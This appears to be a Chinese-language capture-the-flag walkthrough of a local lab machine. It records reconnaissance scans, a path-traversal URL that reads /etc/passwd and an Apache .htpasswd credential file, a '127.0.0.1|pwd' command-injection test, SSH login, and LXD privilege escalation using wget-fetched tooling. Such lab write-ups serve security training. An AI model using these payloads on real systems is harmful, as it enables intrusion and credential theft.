一、信息收集
先arp-scan -l 扫描发现靶机的ip地址
使用nmap -sS -sV -T4 -A -p- 192.168.10.134 扫描存活端口
访问该靶机的网址
http://192.168.10.134
遍历该网址
访问/webadmin
尝试登陆网页
成功登录
二、漏洞利用
1:遍历漏洞
尝试通过关键字检索漏洞
去漏洞库检索
Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers
第一个是文件遍历 可以读取一些文件
使用kali自带的火狐浏览器访问
http://192.168.10.134/download.php?file_name=../../../../../../../../../../../../../etc/passwd
可以看到自动下载了一个文件
遍历/etc/passwd文件成功
根据之前信息收集的结果来看,服务器采用apache
所以尝试读取/etc/apache2/.htpasswd文件
打开得到aiweb2的账号密码
解密
访问webadmin网页
发现robots下还有目录
访问第一个
得到一些灵感 输入了127.0.0.1测试
127.0.0.1|pwd测试
第二个
构造一个请求
访问这个新出现的文件
大胆猜测是ssh的账号密码
直接ssh登录
查看系统信息
权限提升:LXD漏洞
wget https://codeload.github.com/rebootuser/LinEnum/zip/refs/heads/master
kali执行
靶机执行
靶机下载
wget raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine
成功拿到shell啦 并找到flag文件了